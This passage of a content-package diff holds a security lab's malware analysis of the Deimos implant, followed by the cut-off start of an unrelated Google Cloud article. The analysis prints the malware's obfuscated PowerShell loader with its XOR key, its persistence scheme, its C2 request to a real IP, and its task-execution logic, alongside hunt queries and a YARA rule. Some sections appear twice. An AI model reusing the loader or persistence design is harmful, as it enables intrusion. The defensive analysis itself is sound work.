\"$650326ac2b1100c4508b8a700b658ad7='C:\\Users\\user1\\d2e227be5d58955a8d12db18fca5d787\\a5fb52fc397f782c691961d23cf5e785\\4284a9859ab2184b017070368b4a73cd\\89555a8780abdb39d3f1761918c40505\\83e4d9dd7a7735a516696a49efcc2269\\d1c086bb3efeb05d8098a20b80fc3c1a\\650326ac2b1100c4508b8a700b658ad7';$1e3dadee7a4b45213f674cb23b07d4b0='hYaAOxeocQMPVtECUZFJwGHzKnmqITrlyuNiDRkpgdWbSsfjvLBX';$d6ffa847bb31b563e9b7b08aad22d447=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($650326ac2b1100c4508b8a700b658ad7));remove-item $650326ac2b1100c4508b8a700b658ad7;for($i=0;$i -lt $d6ffa847bb31b563e9b7b08aad22d447.count;)\\{for($j=0;$j -lt $1e3dadee7a4b45213f674cb23b07d4b0.length;$j++)\\{$d6ffa847bb31b563e9b7b08aad22d447[$i]=$d6ffa847bb31b563e9b7b08aad22d447[$i] -bxor $1e3dadee7a4b45213f674cb23b07d4b0[$j];$i++;if($i -ge $d6ffa847bb31b563e9b7b08aad22d447.count)\\{$j=$1e3dadee7a4b45213f674cb23b07d4b0.length\\}\\}\\};$d6ffa847bb31b563e9b7b08aad22d447=[System.Text.Encoding]::UTF8.GetString($d6ffa847bb31b563e9b7b08aad22d447);iex $d6ffa847bb31b563e9b7b08aad22d447;\"\n```\n\n_Figure 1: PowerShell executed by malware installer_\n\nThe sample we observed created a Base64-encoded file nested several subdirectories deep in the %USERPROFILE% directory and referenced this file using a runtime variable in the PowerShell script ($650326ac2b1100c4508b8a700b658ad7 in our sample). Once this encoded file was read by PowerShell, it is deleted as shown in Figure 2. Other published research observed the Base64 string within the PowerShell command which made it visible during execution. This shows an adaptation of the obfuscation techniques leveraged by the malware authors in response to reports published by security researchers.\n\n```\nFromBase64String([System.IO.File]::ReadAllText($650326ac2b1100c4508b8a700b658ad7));remove-item $650326ac2b1100c4508b8a700b658ad7\n```\n\n_Figure 2: Base64 encoded file read and then deleted_\n\nAdditionally, there was the inclusion of another variable ($1e3dadee7a4b45213f674cb23b07d4b0 in our example) with a value of hYaAOxeocQMPVtECUZFJwGHzKnmqITrlyuNiDRkpgdWbSsfjvLBX. By deobfuscating the PowerShell command, we determined that this value was the XOR key used to decrypt the value of the 650326ac2b1100c4508b8a700b658ad7 file. Now that we had the location of the Base64 encoded file and the ability to decrypt it, we needed to prevent it from being deleted.\n\nTo do this, we leveraged the [FileDelete](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-23-filedelete-file-delete-archived) event configuration for Sysmon. By default, this creates a directory in the \"C:\\Sysmon\" directory and then places all deleted files (named by the file MD5 + SHA256 hashes + 33 0's + extension) in that folder. This directory is only available to the SYSTEM user. We used [PSExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) to access the folder (psexec -sid cmd). The file contained a single-line Base64-encoded string.\n\nAs we observed in the PowerShell above, the contents are protected using an XOR cipher, but a cipher we have the key for. Using the command-line tools [base64](https://linux.die.net/man/1/base64) and [xortool](https://github.com/hellman/xortool), we're able to decode and decrypt the file:\n\n- base64\n - -D - use the base64 program to decode\n - -i - the input file to be decoded\n - -o - the output file to save the decoded content\n- xortool-xor\n - -r - the XOR cipher key\n - -f - the file that is XOR encrypted\n - \\\\> - output the decrypted file\n\n```\nbase64 -D -i 650326ac2b1100c4508b8a700b658ad7.encoded \\\n-o 650326ac2b1100c4508b8a700b658ad7.decoded\n\nxortool-xor -r hYaAOxeocQMPVtECUZFJwGHzKnmqITrlyuNiDRkpgdWbSsfjvLBX \\\n-f 650326ac2b1100c4508b8a700b658ad7.decoded \\\n\\> 650326ac2b1100c4508b8a700b658ad7.xor\n```\n\n_Figure 3: Decrypting the XOR'd Base64 encoded file_\n\nThis resulted in another obfuscated file that started with an XOR'd Base64-encoded variable and ended with more PowerShell.\n\n```\n$adab58383614f8be4ed9d27508c2b='FTDSclNHUTdlaXBxnKdZa9pUUW9iakpFGDBaelBHbE9mbTVZYlVFbWIxZ...\n\n...CReaTEShorTcuT($ENV:APpDATa+'\\m'+'IcR'+'OSO'+'Ft'+'\\w'+'Ind'+'OW'+'S\\'+'sT'+'ARt'+' ME\n'+'nU'+'\\pr'+'OGR'+'aMS\\'+'sT'+'ART'+'uP'+'\\a44f066dfa44db9fba953a982d48b.LNk');$a78b0ce650249ba927e4cf43d02e5.tARGETpaTh=$a079109a9a641e8b862832e92c1c7+'\\'+$a7f0a120130474bdc120c5f\n13775a;$a78b0ce650249ba927e4cf43d02e5.WInDoWSTYLE=7;$a78b0ce650249ba927e4cf43d02e5.sAvE();IEx $a54b6e0f7564f4ad0bf41a1875401;\n```\n\n_Figure 4: Final obfuscated file (truncated)_\n\nFollowing the same process as before, we identified the XOR key (which may have been trying to use an = sign to appear to look like it was Base64) and decoded the file.\n\n```\nXjBrPGQ7aipqcXYkbTQobjJEX0ZzPGlOfm5YbUEmb1dBazZ0RlpCa2hLQks8eXNxK3tsRHpZVmtmUU9mb31jaVVuMXUxUGk/e0tDa0QmXjA8U0ZAckhgNl5vX1deQGBad2peTyZvVUByaSk2XlBJMTxAdEtnT0B3fnBJPCtfe2tvV0d7P3Y0V2BaeXQ9PmhtI3ZaVHc3I2tGcm5IRmlmUTV8bXpxXlg/cyo8XyFwXyt5QmwjOChQZ09aPXxqaS1hfmxDK3U=\n```\n\n_Figure 5: XOR cipher key_\n\nThis process yielded a .NET DLL file that creates an implant tracking ID and files used for persistence (more about the tracking ID is in the Analysis - Initial Access section).\n\n```\nadab58383614f8be4ed9d27508c2b: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows\n```\n\n_Figure 6: .NET DLL file type_\n\nThe DLL calls itself Mars.Deimos and correlates to previous research by Morphisec, Binary Defense, and security researcher Squibydoo [[1](https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction)] [[2](https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer)] [[3](https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1)] [[4](https://squiblydoo.blog/2021/05/02/mars-deimos-solarmarker-jupyter-infostealer-part-1)] [[5](https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two)]. The particular samples that we've observed utilize the .NET hardening tool [Dotfuscator CE 6.3.0](https://www.preemptive.com/dotfuscator/ce/docs/help/index.html) to hinder malware analysis.\n\nWhat we found particularly interesting is that the authors have spent time modifying the malware in an attempt to make it harder to detect, indicating that they're incentivized to maintain the malware. This is good to know as we move into the analysis phase because it means that we can make an impact on a valuable malware implant that will frustrate those using it for financial gain.\n\n## Analysis\n\nAll indicators referenced in the analysis are located in the Indicators section.\n\n### The Pyramid of Pain\n\nBefore we get into the analysis, let's discuss the model we used to help guide our process.\n\nIn 2013, security researcher David Bianco released an analytical model called the [Pyramid of Pain](http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html). The model is intended to understand how uncovering different parts of an intrusion can impact a campaign. As you can see in the model below, identifying hash values are useful, but easily changed by an adversary whereas identifying TTPs is very difficult for an adversary to change.\n\n\n\nThe goal of using the Pyramid of Pain is to understand as much about the intrusion as possible and project the impact (read: the amount of \"pain\") you can inflict. Throughout the analysis of the observed samples, we'll overlay them onto the Pyramid of Pain as an illustrative method to assess the potential impact.\n\n### File Hashes\n\nOnce we identified that we had observed a new variant of the malware sample, we applied search queries to our dataset and identified 10 unique organizations across multiple verticals, indicating that this did not appear to be targeted. From those 10 organizations, we observed 10 different initial-installer file hashes. The dropped encoded files are also all different.\n\nSo while this information is useful, it is apparent that using a file hash as a detection method would not be useful across organizations.\n\n### IP Addresses\n\nAs other researchers have noted, we observed the same IP address used in the campaign. This IP address was [first associated](https://www.virustotal.com/gui/ip-address/216.230.232.134/relations) with malicious files on August 30, 2021.\n\n```\nIP 216.230.232.134\nAnycast false\nCity Houston\nRegion Texas\nCountry United States (US)\nLocation 29.7633,-95.3633\nOrganization AS40156 The Optimal Link Corporation\nPostal 77052\nTimezone America/Chicago\n```\n\n_Figure 8: Information on identified IP address_\n\nThis IP address has been reported to multiple abuse sites and identified independently by multiple security researchers. We initiated a successful takedown request of the IP address on September 21, 2021, which has removed the observed C2 infrastructure access to any implants.\n\nWhile this atomic indicator is useful for blocking on a firewall, it is trivial for an adversary to change to another IP address, so let’s try to get higher up the pyramid and make a bigger impact on the adversary.\n\n### Artifacts\n\n#### Resource Development\n\nThe lure file samples we analyzed were predominantly signed by organizations in Scandinavian and Slavic-speaking countries, with two outliers from English and French-speaking countries. Multiple samples were signed with a digital certificate registered as a \"Spoloènos s Ruèením Obmedzeným\" (S.R.O.). An [S.R.O.](https://www.offshorecompany.com/company/slovakia-s-r-o/) is a business designation for Slovakian businesses owned by a foreign entity.\n\nThe S.R.O. that we observed as owning the digital signatures (SRO #1) was formed on July 29, 2021, and the signature was observed starting on August 26, 2021. Additionally, the S.R.O. that we observed is owned by a different S.R.O. (SRO #2).\n\n## File Hashes\n\nOnce we identified that we had observed a new variant of the malware sample, we applied search queries to our dataset and identified 10 unique organizations across multiple verticals, indicating that this did not appear to be targeted. From those 10 organizations, we observed 10 different initial-installer file hashes. The dropped encoded files are also all different.\n\nSo while this information is useful, it is apparent that using a file hash as a detection method would not be useful across organizations.\n\n## IP Addresses\n\nAs other researchers have noted, we observed the same IP address used in the campaign. This IP address was [first associated](https://www.virustotal.com/gui/ip-address/216.230.232.134/relations) with malicious files on August 30, 2021.\n\n```\nIP 216.230.232.134\nAnycast false\nCity Houston\nRegion Texas\nCountry United States (US)\nLocation 29.7633,-95.3633\nOrganization AS40156 The Optimal Link Corporation\nPostal 77052\nTimezone America/Chicago\n```\n\n_Figure 8: Information on identified IP address_\n\nThis IP address has been reported to multiple abuse sites and identified independently by multiple security researchers. We initiated a successful takedown request of the IP address on September 21, 2021, which has removed the observed C2 infrastructure access to any implants.\n\nWhile this atomic indicator is useful for blocking on a firewall, it is trivial for an adversary to change to another IP address, so let’s try to get higher up the pyramid and make a bigger impact on the adversary.\n\n### Artifacts\n\n##### Resource Development\n\nThe lure file samples we analyzed were predominantly signed by organizations in Scandinavian and Slavic-speaking countries, with two outliers from English and French-speaking countries. Multiple samples were signed with a digital certificate registered as a \"Spoloènos s Ruèením Obmedzeným\" (S.R.O.). An [S.R.O.](https://www.offshorecompany.com/company/slovakia-s-r-o/) is a business designation for Slovakian businesses owned by a foreign entity.\n\nThe S.R.O. that we observed as owning the digital signatures (SRO #1) was formed on July 29, 2021, and the signature was observed starting on August 26, 2021. Additionally, the S.R.O. that we observed is owned by a different S.R.O. (SRO #2).\n\n\n\nSRO #2 has been in business since August 19, 2014, and provides a variety of services. The owner of SRO #2 has a single-named partner located in a country in the former Eastern Bloc of Europe (Executive manager).\n\n\n\nWe are unable to state definitively if the organizations or people are intentionally involved, cutouts, or unwilling participants so we will not be naming them. This process of obtaining possibly stolen certificates aligns with other samples we analyzed. It is obvious that however these certificates were procured, the person (or persons) responsible appear well-versed with the bureaucracies and laws required in registering a foreign-owned business in Slovakia.\n\n## Initial Access\n\nWe observed the most indicators in this tier. Indicators in the Artifacts tier, both host and network, are valuable to a defender because they are difficult for an adversary to change without considerable rearchitecting of the way the malware functions. This differs from atomic indicators (hashes and infrastructure) in that those elements are modular and can simply be updated. Artifacts, like cipher keys (as we'll see below), are often hard-coded into the source code prior to compilation and require significant work to adjust.\n\nThe dropper creates a series of nested directories whose names are 32-characters long, alphanumeric, and lowercase. In all cases we've observed, there are six nested directories, and a single file within the final subdirectory using the same naming convention. During the initial execution, this file is loaded, deobfuscated with a 52-byte static XOR key, and then executed as a PowerShell script. We have included a hunting query in the Detection section that identifies this activity.\n\nAdditionally, the .Net assembly creates a string by listing all files located at %USERPROFILE%\\APPDATA\\ROAMING. This is stored as the hwid value, which is a unique identifier for this machine. If the file doesn't exist yet, it is created by generating 32 random bytes and encoding them with a custom Base64 encoding.\n\n## Persistence\n\nOnce executed, the PowerShell script establishes persistence of the malware generating a random quantity between 100 and 200 files in a directory named `%APPDATA%\\Microsoft\\`. The random string contains only lowercase and uppercase letters A-Z and the digits 0-9. It could be anywhere between 10 to 20 characters in length. This directory is the staging directory. These files contain randomly generated bytes between 50,000 bytes and 200,000 bytes. The files themselves are named `.`, where each random string follows the same convention as the directory name. Lastly, one final file is written to this directory which contains an obfuscated .Net DLL. This is the actual Deimos implant. It resembles the dummy files with similar attributes in this directory, further attempting to evade defenses.\n\nThe next function script will create two registry keys that provide a Windows shell handler for the first file of random data created above. It uses the file extension of that file to associate a request to execute it with running a PowerShell command. The registry keys are created at `HKEY\\_CURRENT\\_USER\\Software\\Classes\\\\`, where the random string follows the same convention as mentioned above, except for all lowercase characters. The first key will further have a subkey of \\Shell\\Open\\Command that contains the loader PowerShell script. The string value itself has mixed cases in an effort to be more difficult to search for. For example PowErShELl was used in our sample. The second key is effectively an alias that matches the file extension of the first randomly generated file above. It's value matches the lowercase value of the random string used in the first key's path.\n\nThe final persistence artifact is a .LNk file that is placed in the user's StartUp directory. In this sample, it is hard-coded to be named a44f066dfa44db9fba953a982d48b.LNk. The shortcut is set to launch the first randomly generated file above and will open in a minimized window. Upon user login, the link file will tell Windows to launch the file, but it isn't executable. The registry keys above tell Windows to launch the PowerShell command configured in the first key above to execute the file. The PowerShell command contains the full path to the obfuscated .Net DLL and the XOR key to deobfuscate it. Finally, the .Net DLL assembly will be executed by PowerShell by calling the class method [Mars.Deimos]::interact(). This persistence architecture can be difficult to follow in text, so below is a visual representation of the persistence mechanism.\n\n\n\n#### Command and Control Phase\n\nThe malware provides a general-purpose implant that can perform any action at its privilege level. Namely, it can receive and execute a Windows PE file, a PowerShell script, a .Net DLL assembly, or run arbitrary PowerShell commands.\n\nThere are a few command-specific permutations of payload encapsulations, but they are passed to a common method to perform the web request to the C2 server. The web request uses an HTTP POST method and sets a 10-minute timeout on establishing communication.\n\nNo additional headers are set other than the default headers populated by the .Net WebRequest provider, which are: Host, Content-Length, and Connection: Keep-Alive.\n\n```\nPOST / HTTP/1.1\nHost: 216.230.232.134\nContent-Length: 677\nConnection: Keep-Alive\n```\n\n_Figure 12: C2 HTTP headers_\n\nFigure 13 depicts the hex dump of the body of the client's POST request.\n\n\n\nThe first bytes in white are randomly generated and prepended to the body to obfuscate patterns in network communication. There will be between 0 and 512 of these bytes. Next, shown in green, is a null byte, marking the end of random data. The next 10 bytes, shown in blue, are a “cookie” value sent in the last communication from the server. This is likely to prevent replaying captured packets to the server, as each communication is unique. There is nothing specific requiring this to be 10 bytes, but in all traffic we observed, this was the case. In the case of the initial check-in, this is not present. Finally, the remaining bytes shown in red here are the encrypted body. For the initial check-in, this is exactly 256-bytes of RSA encrypted data that includes the key that will be used in follow-on communications, and the unique hardware ID for this implant. For the remaining communications, the client uses AES-128 CBC mode for encryption. For AES encryption, this portion will always be a multiple of 16-bytes in length.\n\nThe RSA public key used for the initial handshake is unique for each campaign. Using the YARA rule in [Figure 24](#yara-rules), we were able to discover a total of 65 samples of the implant. The RSA key provided a pivot to discern unique campaigns, spanning countries from the United States to Moldova. Only 12.5% of the samples included information stealing features, similar to what has been observed with the Jupyter Infostealer. The rest of the samples were the Deimos implant with no additional info stealing capabilities. This could mean that the implant is gaining in popularity as it is full-featured and can be used for initial access and persistence for any campaigns.\n\n#### Main Loop\n\nOnce the check-in process is completed, the main process loop begins. The default action of the implant during the main loop is the ping action. ping sends information about the environment, including the machine name, Windows version, CPU architecture, information about if the user has administrative privileges, and a version string for the implant.\n\nIf a task is scheduled for the implant, the response to the ping command will contain a status value that is set to either \"file\" or \"command\". If no task is given, the implant will sleep for 20 seconds + a random wait between 0 and 20 seconds. This is the wait time between all tasks.\n\nFor \"file\" tasks, the implant immediately performs another request using the task_id attribute from the task definition to retrieve the file. The implant expects an \"exe\" file, a \"ps1\" file, or a \"module\", which is a .Net Assembly file.\n\nWhen an \"exe\" is downloaded, it will be written to a file in the `%TEMP%\\.exe`, where RANDOM_NAME is a 24-character alphanumeric value with all capital letters. A new process is immediately launched by executing the file and the status is reported on the next task interval.\n\nWhen a \"ps1\" file is downloaded, the contents of the script are passed to a new PowerShell process using Standard Input.\n\nFinally, \"module\" files are added to a \"plugin manager\" and executes the \"Run\" method.\n\nFor \"command\" tasks, no additional request is required. The \"command\" value from the response contains PowerShell code that will be executed the same as the \"ps1\" file type.\n\nPresumably, the difference is for quick scripts or perhaps interactive operations, the threat actor would use the \"command\" type. For larger scripts, the \"file\" type would be used.\n\n### Tools\n\nLooking at the metadata from all of the observed samples, we can see a high-confidence connection in that they were all created using a single PDF software platform.\n\n```\nComments : This installation was built with Inno Setup.\nCompany Name :\nFile Description : SlimReader Setup\nFile Version :\nLegal Copyright : (c) InvestTech\nOriginal File Name :\nProduct Name : SlimReader\nProduct Version : 1.4.1.2\n```\n\n_Figure 14: Malware lure file metadata_\n\nWhile this software seems to be legitimate, it seems to be frequently used to create lure files. We have observed 53 malware, or malware-adjacent, samples created using the SlimReader tool. Additionally, the research team at eSentire [identified](https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire) SlimReader as the tool of choice in the creation of, as reported, many hundreds of thousands of lure files.\n\n### TTPs\n\nAt the very top of the pyramid, we observe a characteristic that is present in our samples as well as others reported by security researchers. In all observed cases, the malware used techniques known as [Google Sneaky Redirects](https://developers.google.com/search/docs/advanced/guidelines/sneaky-redirects) and [Search Engine Optimization (SEO) Poisoning](https://www.bankinfosecurity.com/how-seo-poisoning-used-to-deploy-malware-a-16882) to trick users into installing the malware.\n\nSEO poisoning is a technique used to put SEO keywords in a document to inflate its ranking on search engines, so malicious documents and websites are higher on web search results. Additionally, Google Sneaky Redirects is a technique used to name the initial malware installer after the Google search as a way to fool the user into clicking on the file they downloaded. As an example, if a user searches for \"free resume template\", and then clicks on a malicious website that appears to have that file, they will be presented with a malware installer named, in this example, free-resume-template.exe. The malware will leverage a PDF icon even though it is an executable as an attempt to trick the user into executing the PE file, which starts the PowerShell processes highlighted below in the Elastic Analyzer view.\n\n\n\nUnderstanding the malware processes as well as how it interacts with the different elements with the Pyramid of Pain is paramount to inflicting long-term impacts to the activity group and intrusion sets.\n\n## Impact\n\nThe described intrusion sets leverage multiple tactics and techniques categorized by the MITRE ATT&CK® framework. Other TTPs may exist, however, they were not observed during our analysis.\n\n### Tactics\n\n- [Resource Development](https://attack.mitre.org/tactics/TA0042)\n- [Initial Access](https://attack.mitre.org/tactics/TA0001)\n- [Execution](https://attack.mitre.org/tactics/TA0002)\n- [Persistence](https://attack.mitre.org/tactics/TA0003)\n- [Defense Evasion](https://attack.mitre.org/tactics/TA0005)\n- [Command and Control](https://attack.mitre.org/tactics/TA0011)\n\n### Techniques / Sub Techniques\n\n- [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) - [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)\n- [Develop Capabilities](https://attack.mitre.org/techniques/T1587) - [Malware](https://attack.mitre.org/techniques/T1587/001), [Code Signing Certificates](https://attack.mitre.org/techniques/T1587/002) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588) - [Malware](https://attack.mitre.org/techniques/T1588/001), [Code Signing Certificates](https://attack.mitre.org/techniques/T1588/003)\n- [Drive-by Compromise](https://attack.mitre.org/techniques/T1189/)\n- [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) - [PowerShell](https://attack.mitre.org/techniques/T1059/001)\n- [User Execution](https://attack.mitre.org/techniques/T1204) - [Malicious File](https://attack.mitre.org/techniques/T1204/002)\n- [Boot or Logon Autostart Execution](https://attack.mitre.org/techniques/T1547) - [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)\n- [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)\n- [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) - [Indicator Removal from Tools](https://attack.mitre.org/techniques/T1027/005)\n- [Application Layer Protocol](https://attack.mitre.org/techniques/T1071) - [Web Protocols](https://attack.mitre.org/techniques/T1071/001)\n\n## Detection\n\nThere is an [existing detection rule](https://www.elastic.co/guide/en/security/8.0/shortcut-file-written-or-modified-for-persistence.html) that will generically identify this activity. We are also releasing two additional rules to detect these techniques. Additionally, we are providing hunting queries that can identify other intrusion sets leveraging similar techniques.\n\n### Detection Logic\n\nElastic maintains a public repository for detection logic using the Elastic Stack and Elastic Endgame.\n\n### New Detection Rules\n\n[Suspicious Registry Modifications](https://github.com/elastic/detection-rules/issues/1488)\n\n[Abnormal File Extension in User AppData Roaming Path](https://github.com/elastic/detection-rules/issues/1489)\n\n## Hunting Queries\n\nThese queries can be used in Kibana's Security -> Timelines -> New Timeline → Correlation query editor. While these queries will identify this intrusion set, they can also identify other events of note that, once investigated, could lead to other malicious activities.\n\nThis query will identify the initial dropped file containing the obfuscated installer.\n\n```\nfile where file.path regex \"\"\"C:\\\\Users\\\\[^\\\\]*\\\\([a-z0-9]{32}\\\\){6}[a-z0-9]{32}\"\"\"\n```\n\n_Figure 16: Hunt query identifying initial installer_\n\n\n\nThis query will identify the unique “Hardware ID” file (`hwid`) that is created the first time the implant is run. This ID file is used to uniquely identify this installation.\n\n```\nfile where file.path regex~ \"\"\".*\\\\APPDATA\\\\ROAMING\\\\[A-Za-z0-9_]{96,192}\"\"\"\n```\n\n_Figure 18: Hunt query identifying Hardware ID_\n\n\n\nThis query will identify any files with a file extension of ten or more characters in the AppData\\Roaming path.\n\n```\nfile where file.path : \"*\\\\appdata\\\\roaming\\\\*\" and\nlength(file.extension) >= 10 and\nprocess.name : (\"cmd.exe\", \"powershell.exe\", \"wmic.exe\", \"mshta.exe\", \"pwsh.exe\", \"cscript.exe\", \"wscript.exe\", \"regsvr32.exe\", \"RegAsm.exe\", \"rundll32.exe\", \"EQNEDT32.EXE\", \"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSPUB.EXE\", \"MSACCESS.EXE\", \"iexplore.exe\", \"InstallUtil.exe\")\n```\n\n_Figure 20: Hunt query identifying long file extensions_\n\n\n\nThis query will identify a long string value containing the word \"powershell\" in the Registry.\n\n```\nregistry where registry.data.strings : \"*powershell*\" and length(registry.data.strings) \\>= 100\n```\n\n_Figure 22: Hunt query identifying long Registry strings_\n\n\n\n## YARA Rules\n\nWe have created a YARA rule to identify the presence of the Deimos trojan DLL file described in this post.\n\n```\nrule Windows_Trojan_Deimos_DLL {\nmeta:\nauthor = \"Elastic Security\"\ncreation_date = \"2021-09-18\"\nlast_modified = \"2021-09-18\"\nos = \"Windows\"\narch = \"x86\"\ncategory_type = \"Trojan\"\nfamily = \"Deimos\"\nthreat_name = \"Windows.Trojan.Deimos\"\ndescription = \"Detects the presence of the Deimos trojan DLL file.\"\nreference = \"\"\nreference_sample = \"2c1941847f660a99bbc6de16b00e563f70d900f9dbc40c6734871993961d3d3e\"\n\nstrings:\n$a1 = \"\\\\APPDATA\\\\ROAMING\" wide fullword\n$a2 = \"\\{\\\"action\\\":\\\"ping\\\",\\\"\" wide fullword\n$a3 = \"Deimos\" ascii fullword\n$b1 = \\{ 00 57 00 58 00 59 00 5A 00 5F 00 00 17 75 00 73 00 65 00 72 00 \\}\n$b2 = \\{ 0C 08 16 1F 68 9D 08 17 1F 77 9D 08 18 1F 69 9D 08 19 1F 64 9D \\}\ncondition:\nall of ($a*) or 1 of ($b*)\n\\}\n```\n\n_Figure 24: Deimos DLL YARA Rule_\n\nYou can access this YARA rule [here](https://github.com/elastic/examples/tree/master/blog/climbing-the-pyramid-with-celestial-themed-malware).\n\n## Defensive Recommendations\n\nThe following steps can be leveraged to improve a network's protective posture.\n\n1. Review and implement the above detection logic within your environment using technology such as Sysmon and the Elastic Endpoint or Winlogbeat.\n2. Review and ensure that you have deployed the latest Microsoft Security Updates\n3. Maintain backups of your critical systems to aid in quick recovery.\n\n## References\n\nThe following research was referenced throughout the document:\n\n- [https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1](https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1)\n- [https://redcanary.com/blog/yellow-cockatoo](https://redcanary.com/blog/yellow-cockatoo)\n- [https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis](https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis)\n- [https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:MSIL/Deimos.A!rfn&ThreatID=2147770772](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:MSIL/Deimos.A!rfn&ThreatID=2147770772)\n- [http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html](http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html)\n- [https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction](https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction)\n- [https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer](https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer)\n- [https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two](https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two)\n- [https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire](https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire)\n- [https://www.bankinfosecurity.com/how-seo-poisoning-used-to-deploy-malware-a-16882](https://www.bankinfosecurity.com/how-seo-poisoning-used-to-deploy-malware-a-16882)\n\n## Indicators\n\n| Indicators | Type | Note |\n| ---------------------------------------------------------------- | ----------- | ------------------- |\n| f268491d2f7e9ab562a239ec56c4b38d669a7bd88181efb0bd89e450c68dd421 | SHA256 hash | Lure file |\n| af1e952b5b02ca06497e2050bd1ce8d17b9793fdb791473bdae5d994056cb21f | SHA256 hash | Malware installer |\n| d6e1c6a30356009c62bc2aa24f49674a7f492e5a34403344bfdd248656e20a54 | SHA256 hash | .NET DLL file |\n| 216[.]230[.]232[.]134 | IP address | Command and control |\n"
+ },
+ "title": "Going Coast to Coast - Climbing the Pyramid with the Deimos Implant",
+ "slug": "going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant",
+ "date": "2022-06-08",
+ "description": "The Deimos implant was first reported in 2020 and has been in active development; employing advanced analysis countermeasures to frustrate analysis. This post details the campaign TTPs through the malware indicators.",
+ "author": [
+ {
+ "slug": "andrew-pease"
+ },
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "derek-ditch"
+ }
+ ],
+ "image": "blog-security-radar-720x420.png",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ]
+ },
+ "id": "security_labs_content-going_coast_to_coast_climbing_the_pyramid_with_the_deimos_implant-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-google_cloud_for_cyber_data_analytics-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-google_cloud_for_cyber_data_analytics-md.json
new file mode 100644
index 00000000000..b2ac871978c
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-google_cloud_for_cyber_data_analytics-md.json
@@ -0,0 +1,31 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Google Cloud for Cyber Data Analytics\"\nslug: \"google-cloud-for-cyber-data-analytics\"\ndate: \"2023-12-14\"\nsubtitle: \"Navigating the seas of cyber threat data with Google Cloud\"\ndescription: \"This article explains how we conduct comprehensive cyber threat data analysis using Google Cloud, from data extraction and preprocessing to trend analysis and presentation. It emphasizes the value of BigQuery, Python, and Google Sheets - showcasing how to refine and visualize data for insightful cybersecurity analysis.\"\nauthor:\n - slug: terrance-dejesus\n - slug: eric-forte\nimage: \"photo-edited-12.png\"\ncategory:\n - slug: security-research\ntags:\n - google cloud\n---\n\n# Introduction\n\nIn today's digital age, the sheer volume of data generated by devices and systems can be both a challenge and an opportunity for security practitioners. Analyzing a high magnitude of data to craft valuable or actionable insights on cyber attack trends requires precise tools and methodologies.\n\nBefore you delve into the task of data analysis, you might find yourself asking:\n\n - What specific questions am I aiming to answer, and do I possess the necessary data?\n - Where is all the pertinent data located?\n - How can I gain access to this data?\n - Upon accessing the data, what steps are involved in understanding and organizing it?\n - Which tools are most effective for extracting, interpreting, or visualizing the data?\n - Should I analyze the raw data immediately or wait until it has been processed?\n - Most crucially, what actionable insights can be derived from the data?\n\nIf these questions resonate with you, you're on the right path. Welcome to the world of Google Cloud, where we'll address these queries and guide you through the process of creating a comprehensive report.\n\nOur approach will include several steps in the following order:\n\n**Exploration:** We start by thoroughly understanding the data at our disposal. This phase involves identifying potential insights we aim to uncover and verifying the availability of the required data.\n\n**Extraction:** Here, we gather the necessary data, focusing on the most relevant and current information for our analysis.\n\n**Pre-processing and transformation:** At this stage, we prepare the data for analysis. This involves normalizing (cleaning, organizing, and structuring) the data to ensure its readiness for further processing.\n\n**Trend analysis:** The majority of our threat findings and observations derive from this effort. We analyze the processed data for patterns, trends, and anomalies. Techniques such as time series analysis and aggregation are employed to understand the evolution of threats over time and to highlight significant cyber attacks across various platforms.\n\n**Reduction:** In this step, we distill the data to its most relevant elements, focusing on the most significant and insightful aspects.\n\n**Presentation:** The final step is about presenting our findings. Utilizing tools from Google Workspace, we aim to display our insights in a clear, concise, and visually-engaging manner.\n\n**Conclusion:** Reflecting on this journey, we'll discuss the importance of having the right analytical tools. We'll highlight how Google Cloud Platform (GCP) provides an ideal 